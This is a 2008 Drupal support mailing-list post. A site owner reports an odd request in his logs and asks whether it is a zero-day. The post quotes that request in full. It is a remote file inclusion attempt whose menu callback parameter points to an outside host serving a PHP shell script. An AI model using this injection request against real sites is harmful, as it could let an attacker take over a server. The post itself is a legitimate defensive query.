[support] Strange url from log
michel
michel at ziobudda.net
Sun Jan 6 18:17:11 UTC 2008
Hi, I have see this url into my watchdog logs:
drupal/?_menu[callbacks][1][callback]=http://my3dwork.com/images/on.txt?
<http://www.ziobudda.net/rilasciato_drupal_6_beta1/drupal/?_menu%5Bcallbacks%5D%5B1%5D%5Bcallback%5D=http://my3dwork.com/images/on.txt?>
where http://my3dwork.com/images/on.txt
<http://www.ziobudda.net/rilasciato_drupal_6_beta1/drupal/?_menu%5Bcallbacks%5D%5B1%5D%5Bcallback%5D=http://my3dwork.com/images/on.txt?>
is a php shell script.
any 0-day bug ?
I have tried to exec it on my site without "drupal/" and the result is
that the browser is redirect to the homepage.
M.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.drupal.org/pipermail/support/attachments/20080106/1ab3519a/attachment.htm
More information about the support
mailing list